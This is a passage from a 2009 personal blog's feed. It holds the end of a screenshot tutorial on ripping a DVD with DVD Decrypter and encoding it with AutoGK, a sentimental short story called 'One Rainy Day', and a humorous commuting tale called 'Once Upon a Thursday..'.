You can change the destination directory where the ripped files will be kept by clicking on the small folder icon in the Destination frame of the program window.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;On the right-hand side of the program window, the list of files on the DVD will be shown. The .VOB files are the movie files and the .IFOs are information files that tell DVD players where a movie chapter begins etc. The .BUPs are backups of the .IFOs.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;The DVD may contain several IFOs, but what is important is the IFO that points to the main movie. Look carefully in the list of files on the right. The IFO that has the largest VOBs under it is the IFO that we will be using later. In the case of my example, VTS_01_0.IFO is the IFO that we will be using later since VTS_01_1.VOB, VTS_01_2.VOB etc. are the main movie files (check the file size to get an idea).&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;In any case let DVD Decrypter select the main movie for you. 
Go to Edit &gt; Select Main movie files&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_17JNeVdiZ7k/SwaJvbqvLcI/AAAAAAAAARs/jJ-gpBz3_z4/s1600/2.PNG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 254px;" src="http://1.bp.blogspot.com/_17JNeVdiZ7k/SwaJvbqvLcI/AAAAAAAAARs/jJ-gpBz3_z4/s400/2.PNG" alt="" id="BLOGGER_PHOTO_ID_5406159850678726082" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_17JNeVdiZ7k/SwaJv2zFqvI/AAAAAAAAAR0/lIBCx2plweY/s1600/3.PNG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 253px;" src="http://1.bp.blogspot.com/_17JNeVdiZ7k/SwaJv2zFqvI/AAAAAAAAAR0/lIBCx2plweY/s400/3.PNG" alt="" id="BLOGGER_PHOTO_ID_5406159857961511666" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;Once that is done and an output folder selected, you can start the DVD ripping process by clicking on the DVD icon at the bottom of the program window.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_17JNeVdiZ7k/SwaJwN44yhI/AAAAAAAAAR8/bO7A9C_81WM/s1600/4.PNG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 253px;" src="http://1.bp.blogspot.com/_17JNeVdiZ7k/SwaJwN44yhI/AAAAAAAAAR8/bO7A9C_81WM/s400/4.PNG" alt="" id="BLOGGER_PHOTO_ID_5406159864159848978" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;Sit back and relax while DVD Decrypter does its work. 
The ripping process should take around 10 minutes to finish.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;&lt;span style="font-weight: bold;"&gt;Part II [Making the XviD AVI from the Ripped DVD]&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;Once the ripping is over, close DVD Decrypter and run AutoGK.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_17JNeVdiZ7k/SwaJwYzNwEI/AAAAAAAAASE/CU0px9ui07s/s1600/5.PNG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 307px;" src="http://3.bp.blogspot.com/_17JNeVdiZ7k/SwaJwYzNwEI/AAAAAAAAASE/CU0px9ui07s/s400/5.PNG" alt="" id="BLOGGER_PHOTO_ID_5406159867088846914" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;Click on the input file folder icon and browse to the DVD rip folder. Select the IFO file and click Open to load the IFO.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_17JNeVdiZ7k/SwaKOEs0dLI/AAAAAAAAASM/XkzpD4fQkmw/s1600/6.PNG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 308px;" src="http://1.bp.blogspot.com/_17JNeVdiZ7k/SwaKOEs0dLI/AAAAAAAAASM/XkzpD4fQkmw/s400/6.PNG" alt="" id="BLOGGER_PHOTO_ID_5406160377089389746" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;Depending on the DVD a "Select PGC" window may be shown as follows. Select the Program Chain (PGC) that has the longer length. 
In my case PGC 1 had a length of 2 hours, 22 minutes, 46 seconds and 24 milliseconds.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_17JNeVdiZ7k/SwaKOkRuIMI/AAAAAAAAASU/OKDwYEZhK7s/s1600/7.PNG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 257px; height: 136px;" src="http://1.bp.blogspot.com/_17JNeVdiZ7k/SwaKOkRuIMI/AAAAAAAAASU/OKDwYEZhK7s/s400/7.PNG" alt="" id="BLOGGER_PHOTO_ID_5406160385565663426" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;Select the location of the output file by clicking on the folder icon in front of the output file text box in the main AutoGK program window. Type a name that you want the output file to have and click Save.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_17JNeVdiZ7k/SwaKPOZ7eII/AAAAAAAAASc/VMYeVDNDCEw/s1600/8.PNG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 307px;" src="http://4.bp.blogspot.com/_17JNeVdiZ7k/SwaKPOZ7eII/AAAAAAAAASc/VMYeVDNDCEw/s400/8.PNG" alt="" id="BLOGGER_PHOTO_ID_5406160396874381442" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;On a DVD you will often find multiple audio tracks; 6-channel (6ch) tracks are better than 2-channel (2ch) ones. Make your choice of language (if applicable) and proceed to the Step 3 frame. Here you can choose the final size of the movie that will be output. The larger the size, the better the quality, but most 700 MB (1 CD size) movies are also good enough. Select a size or provide your own using the Custom Size option. 
In my case I selected the English 6ch audio track and a movie size of 700 MB (1 CD).&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_17JNeVdiZ7k/SwaKPS7pwEI/AAAAAAAAASk/lZU8gr7kIdQ/s1600/9.PNG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 307px;" src="http://3.bp.blogspot.com/_17JNeVdiZ7k/SwaKPS7pwEI/AAAAAAAAASk/lZU8gr7kIdQ/s400/9.PNG" alt="" id="BLOGGER_PHOTO_ID_5406160398089568322" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;Click on Add job to add the current job to the program's queue and then click on Start to start the actual process.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_17JNeVdiZ7k/SwaKQI5D4bI/AAAAAAAAASs/jtn7SYKNCYo/s1600/10.PNG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 307px;" src="http://4.bp.blogspot.com/_17JNeVdiZ7k/SwaKQI5D4bI/AAAAAAAAASs/jtn7SYKNCYo/s400/10.PNG" alt="" id="BLOGGER_PHOTO_ID_5406160412574212530" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;Sit back and relax. You can actually go to sleep for an hour or two. AutoGK will use VirtualDubMod and lame.exe to process the video and audio respectively. 
AutoGK will open and close several windows and it is advisable to leave the program alone till the entire process is complete and you are greeted with a "Job finished" log entry in the AutoGK log window.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_17JNeVdiZ7k/SwaKo37WEBI/AAAAAAAAAS0/PdpPRA5avjY/s1600/11.PNG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 307px;" src="http://2.bp.blogspot.com/_17JNeVdiZ7k/SwaKo37WEBI/AAAAAAAAAS0/PdpPRA5avjY/s400/11.PNG" alt="" id="BLOGGER_PHOTO_ID_5406160837517119506" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;Now go grab some popcorn, start the movie using VLC, K-Lite or your favorite movie player and enjoy!!&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.riyazwalikar.com/feeds/3625223257228792525/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.riyazwalikar.com/2009/11/700mb-dvdrip-tutorial.html#comment-form" title="1 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4333330172780240225/posts/default/3625223257228792525?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4333330172780240225/posts/default/3625223257228792525?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/riyazwalikar/~3/SVcugR9wiGo/700mb-dvdrip-tutorial.html" title="The 700MB DVDrip Tutorial" /><author><name>Riyaz Ahemed Walikar</name><uri>http://www.blogger.com/profile/10553011445419057597</uri><email>noreply@blogger.com</email><gd:image 
rel="http://schemas.google.com/g/2005#thumbnail" width="22" height="32" src="http://2.bp.blogspot.com/-Gt2oM9Ob-IU/UJzlXjWhBYI/AAAAAAAAAi8/_LtVk7nXhz8/s220/profile.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/_17JNeVdiZ7k/SwaJuwBK_aI/AAAAAAAAARk/-E9RhpvXA3E/s72-c/1.PNG" height="72" width="72" /><thr:total>1</thr:total><feedburner:origLink>http://www.riyazwalikar.com/2009/11/700mb-dvdrip-tutorial.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DkENRHs8fCp7ImA9WxNXFE0.&quot;"><id>tag:blogger.com,1999:blog-4333330172780240225.post-7302727065338950389</id><published>2009-10-01T05:40:00.000-07:00</published><updated>2009-10-01T06:44:55.574-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-10-01T06:44:55.574-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="delnaz" /><category scheme="http://www.blogger.com/atom/ns#" term="ranvir" /><category scheme="http://www.blogger.com/atom/ns#" term="Pain" /><category scheme="http://www.blogger.com/atom/ns#" term="rain" /><category scheme="http://www.blogger.com/atom/ns#" term="life" /><category scheme="http://www.blogger.com/atom/ns#" term="birthday" /><category scheme="http://www.blogger.com/atom/ns#" term="story" /><category scheme="http://www.blogger.com/atom/ns#" term="fiction" /><title>One Rainy Day</title><content type="html">&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:georgia;"&gt;I wrote this a year ago.. still fresh in my memories..&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;Everybody loves the rain. I hate it more than god would allow me to. People also love to celebrate their birthdays with lavish parties and expensive drinks and gifts. I hate the day I was born. I didn’t always hate the falling drops nor birthdays. 
I was a normal guy, am still now, but people don’t think so.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;Traveling to work on a rickety old scooter that my father had bought on his 10th Marriage Anniversary can be a nightmare, especially when you are working in Mumbai and it's pouring outside. To add salt to the injury, my father is an optimist and refuses to accept the fact that the scooter has all the qualifications to be called a fossil. I hate traveling by the bus. You never know, a bus, carrying half the population of China, may go down one of the several flyovers in the city. My financial capabilities limit my rickshaw travel and the only other notion is to walk, and walking 6 and a half kilometers early in the morning is not my cup of tea. Not wanting to hurt my father's spiritual sentiments attached to the antique, I still half ride, half walk to office.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;My job is a pretty plain one. Not that I’m complaining; it's not what you would expect a First Class with Hons. Electronics and Telecommunications Engineer to do, but yes I love my job. Mr. Ranaut, my boss, a moron by character, comes to my cabin every day in the morning, throws 6 or 7 files on my desk and leaves without any logical explanation. My self esteem starts draining every day at 9 in the morning, until the angel appears. Soft-spoken and always in black, she comes in exactly 6 minutes after he has left. Sabrina, or more specifically Miss Sabrina, is the love of my life. Trapped under the clutches of the ill-tempered Ranaut, she is his personal secretary. She is the only other person on this planet, after my father of course, who loves my scooter. My apprehensions abound. I can’t make out whether she is sympathizing with me or likes to pull my leg. Whatever the case, she is one reason why I still work in hell. 
She comes, we clean up the mess that the devil just made and she promises me coffee at 1:00 and scampers away. I finish all the files well before 1 and the entire day I act busy, just to avoid his Highness. Sabrina and I have lunch and then she comes and goes every fifteen minutes or so into my cabin till 7:00 and then the boss drops her home and I try starting my scooter till 8:00 and by the time I reach home, I forget what time it is.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;Sabrina and I have been working together for over a year now. I never had the courage to tell her that I love her more than anything that could have ever existed. Thought it would ruin our friendship, but hey, they always say, no pain no gain. Many a time I gathered enough courage to stand in front of her, look into her deep black eyes and tell her “I Love…” and then my confidence would buckle under the weight of consequences and I would end up saying something stupid like “I Love… to play football, why don’t you join me?” She would always laugh; I would give anything to see her million dollar smile. She always concluded the interaction by saying “Grow up Ranvir!”. And something told me deep inside that she loved me…..&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;Sabrina didn’t have a father. Her maternal uncle was everything to her. Mr. Dias had died when Sabrina was doing her final year in Commerce. She was the only daughter in the family and Mrs. Dias had succumbed to childbirth. She wasn’t rich but yes, she could have bought 10 of my scooters this afternoon itself! Sabrina had invited me several times to her house, but I never had the time; it was an excuse that my subconscious mind would definitely be happy to give. In fact I did not have the courage to go to her house and meet her uncle. 
I knew where she stayed though, precise directions and a road map; she had taken an entire afternoon explaining to me the shortest way from my house and from the office.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;It was a Thursday, and as usual I was in my cabin working under files and papers. Sabrina came around just to make sure I was still breathing and ran her fingers through my hair. She informed me that Ranaut was leaving and she had to go along; he had to discuss some points for tomorrow's meeting with her. It was the usual reason that he gave her and which she gave me. I saw them leave and then 10 minutes later I left. The clouds had gathered overhead and I knew it would pour any minute now. &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;I reached Delnaz Lane, on the way to my house, when it started raining. I parked (threw would be a better word) my scooter next to a flower shop and knew only god would be able to start it now. I had never stopped here in my life and I knew this place was special because Sabrina’s violin classes were on the second floor of the yellow building right in front of me. I still had the map in my pocket; intuition told me to have a look. My heart started beating faster; if my sense of geography was correct, I was standing just two blocks away from Sabrina’s house!! The man in me finally wanted to run and embrace her. The adrenalin rush was just too much to handle; my legs started carrying me towards her house. It was 9 by my watch.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;She lived on the ground floor of Diaspora Apartments, a pink building that rose 5 storeys high. I reached the front door, the sign unmistakably reading Mr. Denver Gonzalez, her uncle. It was pouring more heavily now. I gathered all the strength in me; this was the point of no return. I gave the bell a solid ring. 
Felt sick in the stomach, wanted to run, but vanishing courage gave a final push and I rang the bell again. No response. I rang the bell again. Still no response. The suspense was unnerving. It was 9.10; she never slept this early, never. Where was she?? My heart skipped a beat, unfaithful thoughts coming to my head; she was last seen with the jackal and he never made his intentions clear. The clouds were clearing and I assumed she was out to dinner with her uncle. I left.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;I reached home at 11.00 in the night, clothes sopping wet and scooter in hand. I couldn’t sleep that night. For the first time in my life I had gathered enough courage to walk up to her house and ring the bell and she wasn’t there to open it. I cursed my luck.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;The phone rang in the morning, when I was leaving. They asked for me. Sabrina had met with an accident, a bus had rammed into her the previous night, she was on a respirator and had lost a lot of blood. They said every second she was growing weaker and she had repeatedly called out his name the previous night. They had found his number in her diary. I stood transfixed. My mom shook me out of my stupor and I gathered my senses and I ran, I ran like I have never run in my life. Tears wetting my cheeks all along. Exhausted and with burning lungs, I searched for the Intensive Care Unit.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;I cursed myself for letting her go that day with Ranaut; I didn't care if he was alive or dead. Mr. Gonzalez said she was hit by the bus when she was crossing the road after ordering flowers from the florist at Delnaz Lane for some guy named Ranvir; it was his birthday the next day. My eyes were fixed onto her body when they lowered it down into her grave, where she would rest for eternity. 
She was still wearing black…..&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.riyazwalikar.com/feeds/7302727065338950389/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.riyazwalikar.com/2009/10/one-rainy-day.html#comment-form" title="8 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4333330172780240225/posts/default/7302727065338950389?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4333330172780240225/posts/default/7302727065338950389?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/riyazwalikar/~3/oNMxJkl79q8/one-rainy-day.html" title="One Rainy Day" /><author><name>Riyaz Ahemed Walikar</name><uri>http://www.blogger.com/profile/10553011445419057597</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="22" height="32" src="http://2.bp.blogspot.com/-Gt2oM9Ob-IU/UJzlXjWhBYI/AAAAAAAAAi8/_LtVk7nXhz8/s220/profile.jpg" /></author><thr:total>8</thr:total><feedburner:origLink>http://www.riyazwalikar.com/2009/10/one-rainy-day.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CU8AR3gycCp7ImA9WxNRFkk.&quot;"><id>tag:blogger.com,1999:blog-4333330172780240225.post-2895495741051449371</id><published>2009-09-10T21:13:00.000-07:00</published><updated>2009-09-10T21:37:26.698-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-09-10T21:37:26.698-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="irony" /><category scheme="http://www.blogger.com/atom/ns#" term="sarcasm" /><category scheme="http://www.blogger.com/atom/ns#" term="life" /><category scheme="http://www.blogger.com/atom/ns#" term="office life" /><category 
scheme="http://www.blogger.com/atom/ns#" term="prices" /><category scheme="http://www.blogger.com/atom/ns#" term="dream" /><category scheme="http://www.blogger.com/atom/ns#" term="inflation" /><category scheme="http://www.blogger.com/atom/ns#" term="Humor" /><title>Once Upon a Thursday..</title><content type="html">&lt;span style="font-size:100%;"&gt;&lt;span style="font-family: trebuchet ms;"&gt;Mr. Siva Rao lives somewhere in Jayanagar with his one wife and two sons, the eldest of whom is yet to appear for his PUC examinations after his two failed attempts. Known to people as Mr. Siva Rao, although his birth certificate identifies him as Vijayawada Sitaramanjaneyula Rajasekhara Yarlagadda Venkata Samba Siva Rao, he is one man who could overreact to even the tiniest murmur of thunder in the sky. Known for his shrill audible voice and chalk-white &lt;span style="font-style: italic;"&gt;lungi&lt;/span&gt; that he keeps folding up his waist, Mr. Siva Rao threatens kids, dogs and bikers alike around his locality. He travels to office every day on his new CBZ; thank heavens he wears pants then.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: trebuchet ms;"&gt;It was a beautiful Thursday morning. I was still lazing in bed when I heard Mr. Siva Rao yelling at the top of his voice. I could also hear the soft-spoken voice of Mrs. Rao coming out through their kitchen window. &lt;span style="font-style: italic;"&gt;"How am I supposed to cook? I have been telling you to get the cylinder before this one gets over? Don't tell me I did not warn you?"&lt;/span&gt; I could vaguely imagine Mrs. Rao, a short beautiful woman in her mid 40s, pointing her stubby fingers at the now worthless piece of metal. Mr. Rao then proceeded to say something in his native tongue, which fortunately I didn't understand, but he sounded angry. Then abruptly there was silence. I wondered whether a peace treaty had been signed or Mrs. Rao was now no more. 
I sat upright in my bed, stretching myself. I looked out of my window again to see signs of any movement. Their kitchen window was locked; I assumed there wouldn’t be any more verbal ranting so I slipped out of bed to begin my day.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: trebuchet ms;"&gt;I went through the morning routine methodically to prevent any wastage of water or electricity, which the caretaker of our PG house constantly reminds us of. I ironed my clothes, wore my shoes and stepped out wearing a smile that could give Mona Lisa a run for her money.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: trebuchet ms;"&gt;I first thought it was funny to see 4 men on a bike next to the signal where I usually wait for the bus to arrive, but then I realized, it was the same scene everywhere! Cars were carrying 7-8 people, bikes were loaded with 3-4 people and buses were overflowing! I rubbed my eyes to swallow what I could see. There was less traffic on the road though, even at this peak hour. I was nonchalant and assumed it to be just casual traffic police maneuvers. I skipped 6 buses due to the sudden increase in commuters. The doors would not close, I couldn’t see the driver and the windows were all covered with bums of different sizes. Weird, I thought. It looked as if half of China had invaded India, although I didn't see any Mongoloids amongst the crowd. I was running out of time and knew I would be late for my Annual Performance Review meeting with my Manager. I prayed in silent tears.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: trebuchet ms;"&gt;Somebody on a bike with a pillion rider stopped in front of me. I was happy to see that there were only two people on the bike. The rider pulled off his helmet and then I recognized Mr. Siva Rao. The pillion rider identified himself as Mr. Shetty, Engineer at another Software company down on Outer Ring Road. Mr. 
Siva Rao spoke hesitantly in his usual heavy Tamil accent, &lt;span style="font-style: italic;"&gt;"So you waiting for bus? No bus. No bus. Mr. Shetty here waiting for bus since 8.00 AM in the morning. All crowded. You come, I drop you to office. On way to Marathalli right. Sit sit."&lt;/span&gt; I couldn't refuse but I couldn't stop myself from asking, &lt;span style="font-style: italic;"&gt;"Eh.. Mr. Rao… won't the police fine us for riding three on a bike?"&lt;/span&gt; Mr. Siva Rao smiled showing his misshapen canines. &lt;span style="font-style: italic;"&gt;"Police no say anything. People taking lifts and using buses to reach office. Less traffic faster to reach office less petrol you see."&lt;/span&gt; I could see the end of the tunnel from where all the public insanity was coming. I shrugged, squeezed between Mr. Siva Rao and Mr. Shetty and closed my eyes for the rest of the journey.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: trebuchet ms;"&gt;Mr. Siva Rao dropped me at the closest signal to my office and scampered on with Mr. Shetty, although in the distance I could see him wait and pick up another hapless stranded soul on the Ring Road. I brushed off the creases on my shirt and crossed the road. Several people were on foot today. I saw my colleague Ritesh** entering the gates as I walked up to him. &lt;span style="font-style: italic;"&gt;"No bike today huh?"&lt;/span&gt; He responded with a cold shrug and stared stone-faced at the building entrance. &lt;span style="font-style: italic;"&gt;"A walk a day keeps the doctor away!"&lt;/span&gt; I shook my head; I had heard wittier words than those from him.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: trebuchet ms;"&gt;My day at the office was normal, with just a few bumps here and there. Lunch was something I was looking forward to. Precisely at 2:00, I locked my workstation and proceeded down towards the cafeteria. 
Several employees were standing at the entrance talking in hushed tones. I saw several of my friends in the lot too. I walked up to them. &lt;span style="font-style: italic;"&gt;"Wassup people? Why is everybody out here?"&lt;/span&gt; Raees** whisked me out of the crowd and pointed steadfast at a small notice that had been put up at the counter. I carefully read and re-read the posting. I now knew why people appeared scared and why Raees and the others were tense as if their exam results were to be declared that afternoon.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: trebuchet ms;"&gt;I walked down towards the lonely mess that is visited by a handful of people down the road outside the campus wondering aloud; &lt;span style="font-style: italic;"&gt;"70 bucks for that food?? That's more than a 50 percent hike in prices. God what else?"&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: trebuchet ms;"&gt;I had never been to a mess before, but from what I had heard from the others, the food was good and cheap and this place was hardly visited by anybody. I reached the place following crudely drawn directions given to me by another of my colleagues, Guru**. I couldn’t recognize the place though because it had been described by people as a deserted waste of space. There were at least 30 people in there and several standing in a queue outside!! I saw a familiar face in the queue, I didn't know his name but he was from the same floor that I worked on. I waved to him and casually walked up to where he was standing. Assuming it was unbeknownst to the others, I slowly moved my feet, inch by inch into the queue. As soon as my feet were inside I proceeded to shift the rest of my body into the line, discussing mundane topics like the elections, Harry Potter and Carmen Electra with my newfound friend to throw him and the others off the track. But alas I forgot there were several seasoned players in this game already in the queue.
I soon found myself whisked to the end of the line by several pairs of black strong hands that looked and smelt of tar.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: trebuchet ms;"&gt;I returned to my lab an hour and a half later having had the tastiest food that I had eaten in months. I then proceeded to complete my work. Precisely at 6:00, I fired off the mails that I had kept pending for the past few days. I forwarded some nasty office jokes to my friends, locked the workstation and walked down the stairs to begin my journey back to my room.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: trebuchet ms;"&gt;My afternoon had passed off peacefully and the morning just seemed so far away. As I walked out of the gate, reality slapped me so hard, my eyes watered. There was less traffic no doubt. But the scenario had not improved a tad. There were people on bikes, cars were loaded. I saw several engineers (by the looks of them and the laptop bags they carried) on the top of three trucks, smiling and waving out to people as if they were campaigning for elections!! I vaguely remembered Swades. I flicked out my new Sony Ericsson Z555i with Gesture Control 2 MP camera phone and randomly clicked some pictures. Down the 8th picture, my phone started ringing. Some unknown number, I hoped it wasn’t some bank wanting to give me a personal loan or credit card or something. The excited voice on the other end was familiar. &lt;span style="font-style: italic;"&gt;"Look behind, look behind, behind the red truck, between the bus and the truck… look look…"&lt;/span&gt; I turned around to see Mr. Siva Rao flailing his hands as if he had just seen Sachin Tendulkar. I walked up to him and smiled. He looked small without his helmet on. Unbelievably he was alone.
I did not question him but clambered on to the bike to get home.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: trebuchet ms;"&gt;I slept peacefully that night dreaming about me discovering an oil well in the background of my PG house, becoming rich overnight and marrying Katrina Kaif. The first thing I did with the money in my dreams was to buy a bicycle. Thanking God they didn't run on petrol.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: trebuchet ms;"&gt;** Names changed to protect privacy.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;img src="http://feeds.feedburner.com/~r/riyazwalikar/~4/H4ET-F0EzJE" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.riyazwalikar.com/feeds/2895495741051449371/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.riyazwalikar.com/2009/09/once-upon-thursday.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4333330172780240225/posts/default/2895495741051449371?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4333330172780240225/posts/default/2895495741051449371?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/riyazwalikar/~3/H4ET-F0EzJE/once-upon-thursday.html" title="Once Upon a Thursday.." 
